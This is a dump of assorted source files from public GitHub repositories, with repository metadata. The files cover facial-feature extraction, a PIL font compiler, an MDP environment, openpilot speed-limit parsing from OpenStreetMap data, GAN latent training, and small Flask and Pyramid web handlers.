amplitudes_onset, speed_onset = segmentize(xs[onset_index], clusters[onset_index])
amplitudes_apex, speed_apex = segmentize(xs[apex_index], clusters[apex_index])
amplitudes_offset, speed_offset = segmentize(xs[offset_index], clusters[offset_index])
left_amplitude_onset, _ = segmentize(xs[onset_index], cluster_left_amplitudes[onset_index])
right_amplitude_onset, _ = segmentize(xs[onset_index], cluster_right_amplitudes[onset_index])
left_amplitude_apex, _ = segmentize(xs[apex_index], cluster_left_amplitudes[apex_index])
right_amplitude_apex, _ = segmentize(xs[apex_index], cluster_right_amplitudes[apex_index])
left_amplitude_offset, _ = segmentize(xs[offset_index], cluster_left_amplitudes[offset_index])
right_amplitude_offset, _ = segmentize(xs[offset_index], cluster_right_amplitudes[offset_index])
onsetFeatures = extractFeatures(amplitudes_onset, speed_onset, left_amplitude_onset, right_amplitude_onset)
apexFeatures = extractFeatures(amplitudes_apex, speed_apex, left_amplitude_apex, right_amplitude_apex)
offsetFeatures = extractFeatures(amplitudes_offset, speed_offset, left_amplitude_offset, right_amplitude_offset)
totalFeaturesSet = onsetFeatures + apexFeatures + offsetFeatures
# writeCSV(totalFeaturesSet, 'eye_total', input_folder)
return totalFeaturesSet
if len(sys.argv) != 5:
print('Wrong syntax: use these params.')
print('- input_folder: folder that contains .lm files')
print('- fps: video frame rate of the original video')
print('- gender: (0=male, 1=female)')
print('- age: (es. 42)')
sys.exit()
# Get command line args
input_folder = sys.argv[1] # sys.argv[1] is the folder that contains .lm files
fps = int(sys.argv[2])
gender = int(sys.argv[3])
age = int(sys.argv[4])
# Extract Dlip
# Labels contains the temporal division in onset, offset, and apex
# the same temporal division is then used in eyelid features extractions
labels, dlip_features = extractDlipFeaturesFromFolder(input_folder)
# Extract DEyeLid
dyeyelid_features = extractEyeLidFeaturesFromFolder(input_folder, labels)
# Aggregate
total_features = [gender, age] + dlip_features + dyeyelid_features
# Write on CSV
writeCSV(total_features, 'total', input_folder)
| [
"emavgl@gmail.com"
] | emavgl@gmail.com |
467737aa13e6224c2b5459fae510519622e05c84 | b4c11d69197ef90dcacc8e34884036e4f576855e | /Python/myEnvironment/djangoEnv/bin/pilfont.py | 146697b69ee3a1e8db89379b57baf96f2fd4437e | [] | no_license | VT-Zhang/PYTHON_Platform_Works | c6314715e207995cce0244c38c8d48f95cf934b8 | 52654ef0ecf9102bfe378540818ebbb2dc27a134 | refs/heads/master | 2021-06-15T02:22:03.868898 | 2017-03-07T16:20:26 | 2017-03-07T16:20:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,085 | py | #!/Users/jianzhang/Dropbox/Dojo/Python/myEnvironment/djangoEnv/bin/python2.7
#
# The Python Imaging Library
# $Id$
#
# PIL raster font compiler
#
# history:
# 1997-08-25 fl created
# 2002-03-10 fl use "from PIL import"
#
from __future__ import print_function
import glob
import sys
# drivers
from PIL import BdfFontFile
from PIL import PcfFontFile
VERSION = "0.4"
if len(sys.argv) <= 1:
print("PILFONT", VERSION, "-- PIL font compiler.")
print()
print("Usage: pilfont fontfiles...")
print()
print("Convert given font files to the PIL raster font format.")
print("This version of pilfont supports X BDF and PCF fonts.")
sys.exit(1)
files = []
for f in sys.argv[1:]:
files = files + glob.glob(f)
for f in files:
print(f + "...", end=' ')
try:
fp = open(f, "rb")
try:
p = PcfFontFile.PcfFontFile(fp)
except SyntaxError:
fp.seek(0)
p = BdfFontFile.BdfFontFile(fp)
p.save(f)
except (SyntaxError, IOError):
print("failed")
else:
print("OK")
| [
"jianz@vt.edu"
] | jianz@vt.edu |
514614844345f08437ac5400067ba42873c89217 | eb1a126f069d764614d57f2dd5ec8b0ae11cba20 | /mdp_environment/utils/mdp_core.py | 56f1126d8d76f45fdd1f536fd0a4449512e68da7 | [
"MIT"
] | permissive | Rishav1/mdp_environment | a1a1584977c40b8959a9d96ffad9b0a25c7641c3 | be8b046970586bc9ab25cfb5b428759700ef4480 | refs/heads/master | 2021-05-10T11:03:24.981169 | 2019-03-02T14:30:16 | 2019-03-02T14:30:16 | 118,399,999 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,778 | py | import numpy as np
from mdp_environment.utils.exceptions import *
from mdp_environment.utils.state import State
import warnings
import networkx as nx
import copy
class MDPModel:
"""docstring for MDPModel"""
def __init__(self, name, states=None, actions=None, transitions=None, init_states=None, final_states=None):
self.name = name
if states is None:
self.states = {}
if actions is None:
self.actions = {}
if transitions is None:
self.transitions = {}
if init_states is None:
self.init_states = {}
if final_states is None:
self.final_states = {}
self.finalized = False
self.step = 0
self.final_step = -1
self.initialized = False
self.terminated = True
self.prev_state = None
self.current_state = None
self.visual_graph = nx.MultiDiGraph()
def add_states(self, input_states):
if self.finalized:
raise MDPModelFinalized
for state in input_states:
if state.id in self.states.keys():
raise StateAlreadyPresent({state.id: self.states[state.id].name})
self.states[state.id] = state
self.visual_graph.add_node(state.id, label=state.name)
return self
def get_states(self, state_ids):
if type(state_ids) != list:
if state_ids not in self.states.keys():
raise StateNotPresent(state_ids)
else:
yield self.states[state_ids]
for state_id in state_ids:
if state_id not in self.states.keys():
raise StateNotPresent(state_id)
else:
yield self.states[state_id]
def add_actions(self, input_actions):
if self.finalized:
raise MDPModelFinalized
for action in input_actions:
if action.id in self.actions.keys():
raise ActionAlreadyPresent({action.id: self.actions[action.id].name})
self.actions[action.id] = action
return self
def get_actions(self, action_ids):
if type(action_ids) != list:
if action_ids not in self.actions.keys():
raise ActionNotPresent(action_ids)
else:
yield self.actions[action_ids]
for action_id in action_ids:
if action_id not in self.actions.keys():
raise ActionNotPresent(action_id)
else:
yield self.actions[action_id]
def add_transition(self, state, action, p_transistion):
if self.finalized:
raise MDPModelFinalized
if state.id not in self.states:
raise StateNotPresent(state.id)
if action.id not in self.actions:
raise ActionNotPresent(action.id)
for tstate in p_transistion.keys():
if tstate.id not in self.states:
raise StateNotPresent(tstate.id)
try:
np.testing.assert_almost_equal(np.sum(list(p_transistion.values())), 1.0)
except AssertionError:
raise ProbabilityError(p_transistion.values())
if state.id in self.transitions:
if action.id in self.transitions[state.id]:
warnings.warn("Chaging transition probability at {0}.".format((state.id, action.id)))
if state.id in self.transitions.keys():
self.transitions[state.id][action.id] = p_transistion
else:
self.transitions[state.id] = {action.id: p_transistion}
for tstate, prob in p_transistion.items():
self.visual_graph.add_edge(state.id, tstate.id, weight=prob,
label="{0}".format(action.name, prob))
return self
def add_init_states(self, init_states):
if self.finalized:
raise MDPModelFinalized
for state in init_states.keys():
if state.id not in self.states:
raise StateNotPresent(state.id)
try:
np.testing.assert_almost_equal(np.sum(list(init_states.values())), 1.0)
except AssertionError:
raise ProbabilityError(init_states.values())
self.init_states = init_states
for state in init_states.keys():
attributes = self.visual_graph.node[state.id]
attributes['fillcolor'] = 'green'
attributes['style'] = 'filled'
return self
def add_final_states(self, final_states, final_step=-1):
if self.finalized:
raise MDPModelFinalized
for state in final_states:
if state.id not in self.states:
raise StateNotPresent(state.id)
self.final_states[state.id] = state
attributes = self.visual_graph.node[state.id]
attributes['fillcolor'] = 'red'
attributes['style'] = 'filled'
attributes['shape'] = 'doublecircle'
self.final_step = final_step
return self
def finalize(self):
if not self.init_states:
raise InitStateNotSet
self.finalized = True
def initialize(self):
if not self.finalized:
raise MDPModelNotFinalized
sample = np.random.multinomial(1, list(self.init_states.values()), size=1)
index = np.where(sample[0] == 1)[0][0]
self.prev_state = None
self.current_state = list(self.init_states.keys())[index]
self.initialized = True
self.terminated = False
return self.current_state
def transition(self, action):
if not self.initialized:
raise MDPModelNotInitialized
if self.current_state.id not in self.transitions:
raise InvalidAction((self.current_state, action))
if action.id not in self.transitions[self.current_state.id]:
raise InvalidAction((self.current_state, action))
sample = np.random.multinomial(
1,
list(self.transitions[self.current_state.id][action.id].values()),
1
)
index = np.where(sample[0] == 1)[0][0]
self.prev_state = self.current_state
self.current_state = list(self.transitions[self.current_state.id][action.id].keys())[index]
self.step += 1
if (self.current_state.id not in self.transitions) or (self.current_state.id in self.final_states) or (
self.step == self.final_step):
self.terminated = True
self.initialized = False
self.step = 0
return self.current_state
def is_terminated(self):
return self.terminated
def visualize(self, highlight_state: State = None, highlight_next_state: State = None, file=""):
if not self.finalized:
raise MDPModelNotFinalized
visual_graph = copy.deepcopy(self.visual_graph)
if not highlight_state and not highlight_next_state:
highlight_state = self.prev_state
highlight_next_state = self.current_state
if highlight_state:
attributes = visual_graph.node[highlight_state.id]
attributes['fillcolor'] = 'yellow'
attributes['style'] = 'filled'
if highlight_next_state:
attributes = visual_graph.node[highlight_next_state.id]
attributes['fillcolor'] = 'blue'
attributes['style'] = 'filled'
if highlight_state and highlight_next_state:
attributes = visual_graph.edges[(highlight_state.id, highlight_next_state.id, 0)]
attributes['fillcolor'] = 'purple'
attributes['style'] = 'bold'
if file:
nx.nx_pydot.to_pydot(visual_graph).write_png(file)
return nx.nx_pydot.to_pydot(visual_graph).create_png()
| [
"rishav.chourasia@gmail.com"
] | rishav.chourasia@gmail.com |
dcebc6b36fed20d92041c019092864c956b743da | e6ebd1f9e3968f6ed613e9f35e46716115e6e9c3 | /chapter3/demo1.py | fdb50467279d444e9033ffd2743c6fed6e6e300c | [] | no_license | huwanping001/Python | 897046d3d6d1b420befeefcaa2b9544efa7d1881 | 3c76278f7a9b216b28b8880e0108af3c550b9372 | refs/heads/main | 2023-08-21T00:45:17.991833 | 2021-10-18T13:47:52 | 2021-10-18T13:47:52 | 409,586,414 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 197 | py | # 学校:四川轻化工大学
# 学院:自信学院
# 学生:胡万平
# 开发时间:2021/9/17 19:36
present= input('小胡想要什么礼物呢?')
print(present,type(present))
| [
"noreply@github.com"
] | huwanping001.noreply@github.com |
551665072a6d342be82c0a95fc61d48fcd7a93c6 | be7bcd59ebfb39545b573b7c99dadaad936e0654 | /Lession7/confirmed_user.py | 6892a28b0ef62d88de353c90e4a11a1c7c900fc8 | [] | no_license | Dun9-dev/MyFirstProjects | d646dd0fc614393a99dcfd8221aaff476903af83 | dfbf5ef001ce5955d53c58eff16bdf91a003b1d3 | refs/heads/main | 2023-07-30T19:41:42.153783 | 2021-09-17T10:11:53 | 2021-09-17T10:11:53 | 395,537,262 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 355 | py | unconfirmed_user = ['alice', 'brian', 'candace']
confirmed_user = []
while unconfirmed_user:
current_user = unconfirmed_user.pop()
print(f"Verifying user: {current_user.title()}")
confirmed_user.append(current_user)
print("\nThe following users have been confirmed:")
for confirmed_user in confirmed_user:
print(confirmed_user.title())
| [
"danilshestov35@gmail.com"
] | danilshestov35@gmail.com |
8518f5981c183fe9830b8730ea978e51cd789e27 | a2c5bc6c8d7401d94703a2575703ce64bc90a44d | /selfdrive/mapd/lib/WayRelation.py | 7c796eb403ee993a21a282c0a96a60997c7f2a15 | [
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | rajnmaker/openpilot | 68e149bab1ae5a9d12293196ac093c217697273b | 32da3d10c7d689e3fba33b6ebbd24aed011ece2b | refs/heads/release3 | 2023-03-17T23:33:48.610082 | 2022-08-14T23:01:54 | 2022-08-14T23:03:47 | 215,939,315 | 0 | 0 | MIT | 2019-10-18T04:11:36 | 2019-10-18T04:11:33 | null | UTF-8 | Python | false | false | 15,615 | py | from selfdrive.mapd.lib.geo import DIRECTION, R, vectors, bearing_to_points, distance_to_points
from selfdrive.mapd.lib.osm import create_way
from common.conversions import Conversions as CV
from selfdrive.mapd.config import LANE_WIDTH
from common.basedir import BASEDIR
from datetime import datetime as dt
import numpy as np
import re
import json
_WAY_BBOX_PADING = 80. / R # 80 mts of pading to bounding box. (expressed in radians)
with open(BASEDIR + "/selfdrive/mapd/lib/default_speeds.json", "rb") as f:
_COUNTRY_LIMITS = json.loads(f.read())
_WD = {
'Mo': 0,
'Tu': 1,
'We': 2,
'Th': 3,
'Fr': 4,
'Sa': 5,
'Su': 6
}
_HIGHWAY_RANK = {
'motorway': 0,
'motorway_link': 1,
'trunk': 10,
'trunk_link': 11,
'primary': 20,
'primary_link': 21,
'secondary': 30,
'secondary_link': 31,
'tertiary': 40,
'tertiary_link': 41,
'unclassified': 50,
'residential': 60,
'living_street': 61
}
def is_osm_time_condition_active(condition_string):
"""
Will indicate if a time condition for a restriction as described
@ https://wiki.openstreetmap.org/wiki/Conditional_restrictions
is active for the current date and time of day.
"""
now = dt.now().astimezone()
today = now.date()
week_days = []
# Look for days of week matched and validate if today matches criteria.
dr = re.findall(r'(Mo|Tu|We|Th|Fr|Sa|Su[-,\s]*?)', condition_string)
if len(dr) == 1:
week_days = [_WD[dr[0]]]
# If two or more matches condider it a range of days between 1st and 2nd element.
elif len(dr) > 1:
week_days = list(range(_WD[dr[0]], _WD[dr[1]] + 1))
# If valid week days list is not empy and today day is not in the list, then the time-date range is not active.
if len(week_days) > 0 and now.weekday() not in week_days:
return False
# Look for time ranges on the day. No time range, means all day
tr = re.findall(r'([0-9]{1,2}:[0-9]{2})\s*?-\s*?([0-9]{1,2}:[0-9]{2})', condition_string)
# if no time range but there were week days set, consider it active during the whole day
if len(tr) == 0:
return len(dr) > 0
# Search among time ranges matched, one where now time belongs too. If found range is active.
for times_tup in tr:
times = list(map(lambda tt: dt.
combine(today, dt.strptime(tt, '%H:%M').time().replace(tzinfo=now.tzinfo)), times_tup))
if now >= times[0] and now <= times[1]:
return True
return False
def speed_limit_value_for_limit_string(limit_string):
# Look for matches of speed by default in kph, or in mph when explicitly noted.
v = re.match(r'^\s*([0-9]{1,3})\s*?(mph)?\s*$', limit_string)
if v is None:
return None
conv = CV.MPH_TO_MS if v[2] is not None and v[2] == "mph" else CV.KPH_TO_MS
return conv * float(v[1])
def speed_limit_for_osm_tag_limit_string(limit_string):
# https://wiki.openstreetmap.org/wiki/Key:maxspeed
if limit_string is None:
# When limit is set to 0. is considered not existing.
return 0.
# Attempt to parse limit as simple numeric value considering units.
limit = speed_limit_value_for_limit_string(limit_string)
if limit is not None:
return limit
# Look for matches of speed with country implicit values.
v = re.match(r'^\s*([A-Z]{2}):([a-z_]+):?([0-9]{1,3})?(\s+)?(mph)?\s*', limit_string)
if v is None:
return 0.
if v[2] == "zone" and v[3] is not None:
conv = CV.MPH_TO_MS if v[5] is not None and v[5] == "mph" else CV.KPH_TO_MS
limit = conv * float(v[3])
elif f'{v[1]}:{v[2]}' in _COUNTRY_LIMITS:
limit = speed_limit_value_for_limit_string(_COUNTRY_LIMITS[f'{v[1]}:{v[2]}'])
return limit if limit is not None else 0.
def conditional_speed_limit_for_osm_tag_limit_string(limit_string):
if limit_string is None:
# When limit is set to 0. is considered not existing.
return 0.
# Look for matches of the `<restriction-value> @ (<condition>)` format
v = re.match(r'^(.*)@\s*\((.*)\).*$', limit_string)
if v is None:
return 0. # No valid format match
value = speed_limit_for_osm_tag_limit_string(v[1])
if value == 0.:
return 0. # Invalid speed limit value
# Look for date-time conditions separated by semicolon
v = re.findall(r'(?:;|^)([^;]*)', v[2])
for datetime_condition in v:
if is_osm_time_condition_active(datetime_condition):
return value
# If we get here, no current date-time conditon is active.
return 0.
class WayRelation():
"""A class that represent the relationship of an OSM way and a given `location` and `bearing` of a driving vehicle.
"""
def __init__(self, way, parent=None):
self.way = way
self.parent = parent
self.parent_wr_id = parent.id if parent is not None else None # For WRs created as splits of other WRs
self.reset_location_variables()
self.direction = DIRECTION.NONE
self._speed_limit = None
self._one_way = way.tags.get("oneway")
self.name = way.tags.get('name')
self.ref = way.tags.get('ref')
self.highway_type = way.tags.get("highway")
self.highway_rank = _HIGHWAY_RANK.get(self.highway_type, 1000)
try:
self.lanes = int(way.tags.get('lanes'))
except Exception:
self.lanes = 2
# Create numpy arrays with nodes data to support calculations.
self._nodes_np = np.radians(np.array([[nd.lat, nd.lon] for nd in way.nodes], dtype=float))
self._nodes_ids = np.array([nd.id for nd in way .nodes], dtype=int)
# Get the vectors representation of the segments betwheen consecutive nodes. (N-1, 2)
v = vectors(self._nodes_np) * R
# Calculate the vector magnitudes (or distance) between nodes. (N-1)
self._way_distances = np.linalg.norm(v, axis=1)
# Calculate the bearing (from true north clockwise) for every section of the way (vectors between nodes). (N-1)
self._way_bearings = np.arctan2(v[:, 0], v[:, 1])
# Define bounding box to ease the process of locating a node in a way.
# [[min_lat, min_lon], [max_lat, max_lon]]
self.bbox = np.row_stack((np.amin(self._nodes_np, 0) - _WAY_BBOX_PADING,
np.amax(self._nodes_np, 0) + _WAY_BBOX_PADING))
# Get the edge nodes ids.
self.edge_nodes_ids = [way.nodes[0].id, way.nodes[-1].id]
def __repr__(self):
return f'(id: {self.id}, between {self.behind_idx} and {self.ahead_idx}, {self.direction}, active: {self.active})'
def __eq__(self, other):
if isinstance(other, WayRelation):
return self.id == other.id
return False
def reset_location_variables(self):
self.distance_to_node_ahead = 0.
self.location_rad = None
self.bearing_rad = None
self.active = False
self.diverting = False
self.ahead_idx = None
self.behind_idx = None
self._active_bearing_delta = None
self._distance_to_way = None
@property
def id(self):
return self.way.id
@property
def road_name(self):
if self.name is not None:
return self.name
return self.ref
def update(self, location_rad, bearing_rad, location_stdev):
"""Will update and validate the associated way with a given `location_rad` and `bearing_rad`.
Specifically it will find the nodes behind and ahead of the current location and bearing.
If no proper fit to the way geometry, the way relation is marked as invalid.
"""
self.reset_location_variables()
# Ignore if location not in way bounding box
if not self.is_location_in_bbox(location_rad):
return
# - Get the distance and bearings from location to all nodes. (N)
bearings = bearing_to_points(location_rad, self._nodes_np)
distances = distance_to_points(location_rad, self._nodes_np)
# - Get absolute bearing delta to current driving bearing. (N)
delta = np.abs(bearing_rad - bearings)
# - Nodes are ahead if the cosine of the delta is positive (N)
is_ahead = np.cos(delta) >= 0.
# - Possible locations on the way are those where adjacent nodes change from ahead to behind or viceversa.
possible_idxs = np.nonzero(np.diff(is_ahead))[0]
# - when no possible locations found, then the location is not in this way.
if len(possible_idxs) == 0:
return
# - Find then angle formed between the vectors from the current location to consecutive nodes. This is the
# value of the difference in the bearings of the vectors.
teta = np.diff(bearings)
# - When two consecutive nodes will be ahead and behind, they will form a triangle with the current location.
# We find the closest distance to the way by solving the area of the triangle and finding the height (h).
# We must use the abolute value of the sin of the angle in the formula, which is equivalent to ensure we
# are considering the smallest of the two angles formed between the two vectors.
# https://www.mathsisfun.com/algebra/trig-area-triangle-without-right-angle.html
h = distances[:-1] * distances[1:] * np.abs(np.sin(teta)) / self._way_distances
# - Calculate the delta between driving bearing and way bearings. (N-1)
bw_delta = self._way_bearings - bearing_rad
# - The absolut value of the sin of `bw_delta` indicates how close the bearings match independent of direction.
# We will use this value along the distance to the way to aid on way selection. (N-1)
abs_sin_bw_delta = np.abs(np.sin(bw_delta))
# - Get the delta to way bearing indicators and the distance to the way for the possible locations.
abs_sin_bw_delta_possible = abs_sin_bw_delta[possible_idxs]
h_possible = h[possible_idxs]
# - Get the index where the distance to the way is minimum. That is the chosen location.
min_h_possible_idx = np.argmin(h_possible)
min_delta_idx = possible_idxs[min_h_possible_idx]
# - If the distance to the way is over 4 standard deviations of the gps accuracy + half the maximum road width
# estimate, then we are way too far to stick to this way (i.e. we are not on this way anymore)
half_road_width_estimate = self.lanes * LANE_WIDTH / 2.
if h_possible[min_h_possible_idx] > 4. * location_stdev + half_road_width_estimate:
return
# - If the distance to the road is greater than 2 standard deviations of the gps accuracy + half the maximum road
# width estimate then we are most likely diverting from this route.
diverting = h_possible[min_h_possible_idx] > 2. * location_stdev + half_road_width_estimate
# Populate location variables with result
if is_ahead[min_delta_idx]:
self.direction = DIRECTION.BACKWARD
self.ahead_idx = min_delta_idx
self.behind_idx = min_delta_idx + 1
else:
self.direction = DIRECTION.FORWARD
self.ahead_idx = min_delta_idx + 1
self.behind_idx = min_delta_idx
self._distance_to_way = h[min_delta_idx]
self._active_bearing_delta = abs_sin_bw_delta_possible[min_h_possible_idx]
# TODO: The distance to node ahead currently represent the distance from the GPS fix location.
# It would be perhaps more accurate to use the distance on the projection over the direct line between
# the two nodes.
self.distance_to_node_ahead = distances[self.ahead_idx]
self.active = True
self.diverting = diverting
self.location_rad = location_rad
self.bearing_rad = bearing_rad
self._speed_limit = None
def update_direction_from_starting_node(self, start_node_id):
self._speed_limit = None
if self.edge_nodes_ids[0] == start_node_id:
self.direction = DIRECTION.FORWARD
elif self.edge_nodes_ids[-1] == start_node_id:
self.direction = DIRECTION.BACKWARD
else:
self.direction = DIRECTION.NONE
def is_location_in_bbox(self, location_rad):
"""Indicates if a given location is contained in the bounding box surrounding the way.
self.bbox = [[min_lat, min_lon], [max_lat, max_lon]]
"""
is_g = np.greater_equal(location_rad, self.bbox[0, :])
is_l = np.less_equal(location_rad, self.bbox[1, :])
return np.all(np.concatenate((is_g, is_l)))
@property
def speed_limit(self):
if self._speed_limit is not None:
return self._speed_limit
# Get string from corresponding tag, consider conditional limits first.
limit_string = self.way.tags.get("maxspeed:conditional")
if limit_string is None:
if self.direction == DIRECTION.FORWARD:
limit_string = self.way.tags.get("maxspeed:forward:conditional")
elif self.direction == DIRECTION.BACKWARD:
limit_string = self.way.tags.get("maxspeed:backward:conditional")
limit = conditional_speed_limit_for_osm_tag_limit_string(limit_string)
# When no conditional limit set, attempt to get from regular speed limit tags.
if limit == 0.:
limit_string = self.way.tags.get("maxspeed")
if limit_string is None:
if self.direction == DIRECTION.FORWARD:
limit_string = self.way.tags.get("maxspeed:forward")
elif self.direction == DIRECTION.BACKWARD:
limit_string = self.way.tags.get("maxspeed:backward")
limit = speed_limit_for_osm_tag_limit_string(limit_string)
self._speed_limit = limit
return self._speed_limit
@property
def active_bearing_delta(self):
"""Returns the sine of the delta between the current location bearing and the exact
bearing of the portion of way we are currentluy located at.
"""
return self._active_bearing_delta
@property
def is_one_way(self):
return self._one_way in ['yes'] or self.highway_type in ["motorway"]
@property
def is_prohibited(self):
# Direction must be defined to asses this property. Default to `True` if not.
if self.direction == DIRECTION.NONE:
return True
return self.is_one_way and self.direction == DIRECTION.BACKWARD
@property
def distance_to_way(self):
"""Returns the perpendicular (i.e. minimum) distance between current location and the way
"""
return self._distance_to_way
@property
def node_ahead(self):
return self.way.nodes[self.ahead_idx] if self.ahead_idx is not None else None
@property
def last_node(self):
"""Returns the last node on the way considering the traveling direction
"""
if self.direction == DIRECTION.FORWARD:
return self.way.nodes[-1]
if self.direction == DIRECTION.BACKWARD:
return self.way.nodes[0]
return None
@property
def last_node_coordinates(self):
"""Returns the coordinates for the last node on the way considering the traveling direction. (in radians)
"""
if self.direction == DIRECTION.FORWARD:
return self._nodes_np[-1]
if self.direction == DIRECTION.BACKWARD:
return self._nodes_np[0]
return None
def node_before_edge_coordinates(self, node_id):
"""Returns the coordinates of the node before the edge node identifeid with `node_id`. (in radians)
"""
if self.edge_nodes_ids[0] == node_id:
return self._nodes_np[1]
if self.edge_nodes_ids[-1] == node_id:
return self._nodes_np[-2]
return np.array([0., 0.])
def split(self, node_id, way_ids=None):
""" Returns and array with the way relations resulting from spliting the current way relation at node_id
"""
idxs = np.nonzero(self._nodes_ids == node_id)[0]
if len(idxs) == 0:
return []
idx = idxs[0]
if idx == 0 or idx == len(self._nodes_ids) - 1:
return [self]
if not isinstance(way_ids, list):
way_ids = [-1, -2] # Default id values.
ways = [create_way(way_ids[0], node_ids=self._nodes_ids[:idx + 1], from_way=self.way),
create_way(way_ids[1], node_ids=self._nodes_ids[idx:], from_way=self.way)]
return [WayRelation(way, parent=self) for way in ways]
| [
"dgnpilot@gmail.com"
] | dgnpilot@gmail.com |
5160df22bf339592d41b4ff90b972fa65bcbcd93 | 773c02448ad1766270583cadcbb5c2c71347efd2 | /T2_img2latent.py | 0a200f93eb514a9c131e57b12e6605ca580d353a | [] | no_license | thoppe/SyntheticCountenance | b4640c8009ba5bc2377a11aac88cc1be75d7b92c | c06e186fb0596a50d9080b38b80d81c58f2bdde4 | refs/heads/master | 2020-04-14T19:36:12.431157 | 2019-02-02T22:05:20 | 2019-02-02T22:05:20 | 164,064,092 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,142 | py | """
The idea is to find the img such that D(img) is minimized, that is the picture
that _most_ fools the discriminator.
"""
import numpy as np
import os, json, glob, random, h5py
from tqdm import tqdm
import tensorflow as tf
from src.GAN_model import GAN_output_to_RGB, RGB_to_GAN_output
from src.img2latent import Image2Latent
def image_pipeline(batch_size=5):
f_h5 = 'samples/PGAN_small_images.h5'
with h5py.File(f_h5, 'r') as h5:
N = len(h5['Z'])
Z = h5['Z'][...]
while True:
idx = np.random.randint(0, N, size=batch_size)
img = np.array([h5['IMG'][i] for i in idx])
img = RGB_to_GAN_output(img, batch_size=batch_size, resize=False)
yield Z[idx], img
if __name__ == "__main__":
batch_size = 32
n_epochs = 2000
n_save_every = 50
ITR = image_pipeline(batch_size)
clf = Image2Latent(batch_size=batch_size)
while True:
for n, (z,img) in enumerate(ITR):
if n%n_save_every == 0:
clf.render(z, img)
#s = clf.save()
lx = clf.train(z, img)
print(n, lx)
| [
"travis.hoppe@gmail.com"
] | travis.hoppe@gmail.com |
7fdf36763e8df784414735157463d4c018fde93b | ee6316029d2f09a01a1ea35a671d9bbf9f0597f6 | /webapp/home/controllers.py | cf58747d8bac3f4a275b861c7b9c1c57d47a2ff6 | [] | no_license | Eih3/flandria | fa7d2d9501642283e1831089107e17df56f453b1 | 59fd3bcb94e3070c2a60ab5e9997ae0f035b25e5 | refs/heads/master | 2020-05-17T19:16:45.268665 | 2019-04-28T13:13:34 | 2019-04-28T13:13:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 829 | py | from flask import Blueprint, render_template, send_from_directory, request, url_for, current_app, make_response, redirect
home = Blueprint("home", __name__)
@home.route("/")
def index():
return render_template("home/index.html", title="Home")
@home.route("/language/<language_code>")
def set_language(language_code):
url = request.args.get("url")
if url:
resp = make_response(redirect(url))
else:
resp = make_response(redirect(url_for("home.index")))
resp.set_cookie('flandria-language', language_code, max_age=60*60*24*365*1)
return resp
@home.route('/robots.txt')
def robots_txt():
return send_from_directory(current_app.static_folder, request.path[1:])
@home.route('/sitemap.xml')
def sitemap_xml():
return send_from_directory(current_app.static_folder, request.path[1:])
| [
"jeremyregitz@gmail.com"
] | jeremyregitz@gmail.com |
2dff5884c1274d573e0df7ee5b14c4d608ba9edc | c33e2687611ed31435230fec97e19af9216fbcc0 | /經典題庫百題/分類題庫/APCS考古題/201810/1.運動明星.py | 2b67d8a4741e443f923e12d2ae112151b63a47dd | [] | no_license | jiangsir/107-HighSchoolPython | e44ff5ee6d4c0468c789fb126b9da174b437448c | a04634de9866d16f3805a2e724766647de67eeab | refs/heads/master | 2020-04-13T17:29:01.249234 | 2019-06-14T08:41:05 | 2019-06-14T08:41:05 | 163,349,506 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 248 | py | '''
'''
T = int(input())
total = 0
count = 0
for _ in range(T):
moneys = [int(x) for x in input().split()]
rank = moneys[0]
total += moneys[rank]
if moneys[rank] == max(moneys[1:]):
count += 1
print(total)
print(count)
| [
"jiangzero@gmail.com"
] | jiangzero@gmail.com |
a29d78349416b6ce7925ab1bea134ec5c5290a40 | fe9935b08e22fc019fbcfd6c0bc37ab235e2a0e2 | /catkin_ws/build/turtlebot3/turtlebot3_slam/catkin_generated/pkg.installspace.context.pc.py | 2b3adfe705c7cb5a2de1c3879540eba77759f080 | [] | no_license | abdussametkaradeniz/RosLessonsAndTutorials | ce22a06d8a881d949479956ea6aa06ff9f8bf41b | 940597350f5ed85244696ec44fe567fd89a6d5d8 | refs/heads/main | 2023-07-18T22:56:52.075918 | 2021-09-07T21:42:24 | 2021-09-07T21:42:24 | 404,125,607 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 436 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "${prefix}/include".split(';') if "${prefix}/include" != "" else []
PROJECT_CATKIN_DEPENDS = "roscpp;sensor_msgs".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "turtlebot3_slam"
PROJECT_SPACE_DIR = "/home/ardentblaze/catkin_ws/install"
PROJECT_VERSION = "1.2.5"
| [
"abdussametgosukaradeniz@gmail.com"
] | abdussametgosukaradeniz@gmail.com |
5ebfcdfcba4b166ff16cfa28afc5687acc95fbcb | a0ad15548b2fd2567e12d8cb45cc78f0b638aa5f | /zello_backend/services/blog_record.py | b26d44302d79200ad0ed8966de21d83d603c1693 | [] | no_license | sam7sa/zello_backend | 1c8c9a013cd895d820fd9b8349e7d639f950999a | e3e360d8b80f9c6a1c29e15c175d0e8867e93ce5 | refs/heads/master | 2021-05-31T11:26:03.895740 | 2016-06-15T16:35:41 | 2016-06-15T16:35:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 928 | py | import sqlalchemy as sa
from paginate_sqlalchemy import SqlalchemyOrmPage
from ..models.blog_record import BlogRecord
class BlogRecordService(object):
@classmethod
def all(cls, request):
query = request.dbsession.query(BlogRecord)
return query.order_by(sa.desc(BlogRecord.created))
@classmethod
def by_id(cls, _id, request):
query = request.dbsession.query(BlogRecord)
return query.get(_id)
@classmethod
def get_paginator(cls, request, page=1):
query = request.dbsession.query(BlogRecord)
query = query.order_by(sa.desc(BlogRecord.created))
query_params = request.GET.mixed()
def url_maker(link_page):
query_params['page'] = link_page
return request.current_route_url(_query=query_params)
return SqlalchemyOrmPage(query, page, items_per_page=5,
url_maker=url_maker)
| [
"maxim@aeromultimedia.com"
] | maxim@aeromultimedia.com |
